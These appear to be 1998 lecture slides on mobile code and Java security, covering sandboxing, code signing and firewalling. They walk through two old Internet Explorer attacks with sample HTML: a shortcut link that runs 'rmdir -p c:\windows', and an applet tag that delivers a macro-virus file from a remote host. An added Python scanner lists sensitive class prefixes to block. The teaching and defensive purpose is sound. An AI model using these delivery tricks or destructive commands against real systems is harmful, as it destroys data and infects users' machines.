
Mobile Computing


G22.3033.06 - Lecture

April 7th, 1998

Mobile Code on the Web

• Executables
  – stored on the client
  – sent to client
  – interpreted in the browser
• Risks
  – run native code on the machine
    • little or no protection in WIN95 or WIN98
    • full user permission on UNIX
  – access to file and network port connections

JAVA

• code can execute remotely and locally
• client’s browser used to
  – display information and forms
  – interpret (executable) code obtained in remote applets
• can create interactive web pages
• allows for animation, games, and potential to run unlimited remote applications

Problems with JAVA

• execution at client of general-purpose script
• enabling technology for the hacker
• ideal platform for
  – stealing, modifying code or erasing information
  – corrupting client machine and data
  – malicious users

Types of Attack

• integrity
  – deletion / modification of files
  – modifications of memory currently in use
  – killing processes / threads
• availability
  – allocating large amount of memory
  – creating thousands of windows
  – creating high priority threads / processes
• disclosure
  – mailing information about client machine (ex. /etc/passwd, private email)
  – sending personal or company files to an adversary over the network
  – using access to local machine to carry out timing attacks
• annoyance
  – displaying unwanted pictures on client screen
  – playing unwanted sounds on audio output device

Securing Mobile Code

• limit the privileges of the executable (ex. Sandbox model)
• obtain assurance that source of executable is trusted
  – code signing model
• limit the set of programs that can run on a client based on the executables' properties
  – firewalling approach
• proof-carrying code


Sandbox - JAVA

• goal is to limit access to:
  – file system
  – ability to open connections
  – mail and other applications
• mechanisms in practice:
  – ClassLoader
  – bytecode verifier
  – security manager

ClassLoader and the Bytecode Verifier

• ClassLoader
  – loads local classes
  – loads and tags remote classes
• bytecode verifier checks that remote code:
  – does not forge pointers
  – does not violate access restrictions
  – accesses objects by correct type
  – accesses methods with correct argument types
  – contains no stack overflow

Security Manager

• uses methods to check specific conditions
  – check READ (check if a file is to be read)
  – check ACCEPT (check if a network connection can be accepted)
  – etc.
• provides flexible mechanism for conditionally allowing access to resources
• allows sys admin to define flexible security policy
• such flexibility is dangerous (sys admins make mistakes)

Code Signing Model

• checks list for entities it trusts
• executable content is signed by:
  – a trusted entity
  – an entity with a certificate signed by a trusted entity
• real world example: ActiveX
• hybrid scheme:
  – signed code sections are loaded as local by ClassLoader

Firewalling

• Finjan approach
  – looks for characteristics in applets
  – Similar to a virus checker, the Finjan approach uses this type of pattern-matching
• playground approach
  – split applets into
    • graphics server
    • playground, where code actually executes
  – communication via RMI (Remote Message Invocation)
  – commercial venture (ex. Digitivity)

Timing Attack

• can use timing information to:
  – recover bit by bit of secret key
  – each encryption reveals a bit of the key
  – many existing implementations are vulnerable and not likely to change soon
• a remote Java applet enables the attack by gathering timing data

JAVA security

• JAVA is an exciting enabling technology
• computer hackers might be the most excited
• policy decisions have to be made (ex. Allow file system access?)
• policy decisions may be difficult to enforce
• greatest threats are bugs in:
  – code
  – policy enforcement
  – browser
  – OS

Recent Hole in IE

• discovered by Paul Greene
• coverage: CNN, NBC, CBS, InfoWorld
• Microsoft posted a 400K patch within 48 hours
  – Why does this worry me?
    • effects of attack are devastating
    • we are very lucky that the “good guys” found this one first

The setting

• WIN95 and WIN NT shortcuts
  – basically symbolic links
  – stored in .LNK and .URL files depending on where they point
  – contain relative or absolute path to executables
• when a user clicks on (executes) a shortcut, the program it points to runs

The attack

• when a shortcut appears in a URL, it is treated the same as a local one
• sample HTML on a page
  – <A HREF="SEXY.LNK"> Click here for reward </A>
• when a user clicks:
  – SEXY.LNK is downloaded to the machine
  – the thing pointed to by SEXY.LNK executes

The Consequence

• Using WIN95, SEXY.LNK points to:
  – c:\bin\mkdir c:\hahahaha
  – c:\bin\rmdir -p c:\windows
• batch file attack executes FILE.BAT on client
• basic attack allows bad guys to
  – download a pointer to any program on the machine
  – include any argument to the program
  – execute it when you visit the page
• more dangerous for WIN95 because of params
• THIS IS VERY SERIOUS

MS Word Macro attack (on IE)

• due to Felten and Balfanz
• attacker creates FOO.DOT (with macro virus)
• attacker renames the FOO.DOT to FOO.CLASS
• attacker adds FOO.CLASS to web server
• attacker creates a web page that points to an applet named FOO.CLASS
  – <applet codebase="http://host.com/pub/" code=foo.class> </applet>
• the page is loaded
• browser does not execute FOO.CLASS (applet format is wrong)
• FOO.CLASS is now stored somewhere in the local cache - the browser redirects to the new page
• the new page loads a “URL” of type “FILE”
  – the URL is the FOO.CLASS file, which is now in the cache (the attacker can figure out what this is called)
• browser recognizes the file as an MS WORD file and
  – launches MS WORD application
  – macro virus executes
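
Added example (not part of the original slides, and not Finjan's product code): a Python sketch of the gateway-style pattern matching from the Firewalling slide, which also rejects a file served as an applet that is not a class file at all, as with the renamed FOO.DOT above. The SENSITIVE prefix list, the function names and the sample bytes are assumptions constructed for illustration.

```python
import struct

CLASS_MAGIC = b"\xca\xfe\xba\xbe"
OLE2_MAGIC = bytes.fromhex("d0cf11e0a1b11ae1")   # MS Office compound document
# Payload size per constant-pool tag (tag 1, Utf8, is variable length).
FIXED = {3: 4, 4: 4, 5: 8, 6: 8, 7: 2, 8: 2, 9: 4, 10: 4, 11: 4, 12: 4,
         15: 3, 16: 2, 17: 4, 18: 4, 19: 2, 20: 2}
# Assumed gateway policy: class-name prefixes an untrusted applet may not reference.
SENSITIVE = ("java/io/File", "java/net/", "java/lang/Runtime")

def referenced_classes(data):
    """Return the class names referenced from a .class file's constant pool."""
    if data[:4] != CLASS_MAGIC:
        kind = "OLE2 document" if data[:8] == OLE2_MAGIC else "unknown format"
        raise ValueError(f"not a Java class file ({kind})")
    (count,) = struct.unpack_from(">H", data, 8)
    utf8, class_refs, pos, i = {}, [], 10, 1
    while i < count:
        tag = data[pos]
        pos += 1
        if tag == 1:                                # CONSTANT_Utf8
            (n,) = struct.unpack_from(">H", data, pos)
            utf8[i] = data[pos + 2:pos + 2 + n].decode("utf-8", "replace")
            pos += 2 + n
        elif tag in FIXED:
            if tag == 7:                            # CONSTANT_Class: index of its name
                class_refs.append(struct.unpack_from(">H", data, pos)[0])
            pos += FIXED[tag]
            i += tag in (5, 6)                      # long/double take two pool slots
        else:
            raise ValueError(f"malformed constant pool (tag {tag})")
        i += 1
    return [utf8[j] for j in class_refs if j in utf8]

def scan(data):
    """Gateway verdict (allowed, reasons) for bytes served as an applet."""
    try:
        names = referenced_classes(data)
    except (ValueError, IndexError, struct.error) as exc:
        return False, [str(exc)]
    hits = sorted(n for n in names if n.startswith(SENSITIVE))
    return not hits, hits

def make_class(*class_names):
    """Constructed sample: class-file header plus a pool naming the given classes."""
    pool = b""
    for k, name in enumerate(class_names):
        raw = name.encode()
        pool += b"\x01" + struct.pack(">H", len(raw)) + raw + b"\x07" + struct.pack(">H", 2 * k + 1)
    return CLASS_MAGIC + struct.pack(">HHH", 3, 45, 2 * len(class_names) + 1) + pool
```

Class names assembled at run time never appear as CONSTANT_Class entries, so a clean verdict from this kind of pattern matching is not proof of benign behaviour.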

Microsoft’s “fix” to both attacks

• display a pop-up window
  – “save to disk or open?”
  – SAVE - postpone danger
  – OPEN - it will execute

1. Do users read pop-up windows?

2. Do users pay attention to pop-up windows?

3. Do users just click OK so they can continue?

Answers: 1. NO 2. NO 3. YES

Types of Firewalls

• basic firewall policy:
  – insiders are good
  – outsiders are bad
• basic JAVA policy
  – bad outsiders can be kept under control
• basic problem when combining policy

Cryptography

• not a silver bullet
• need good system implementations (ex. pick good primes)
• key management
• International Policy Agreement
• good, secure tokens

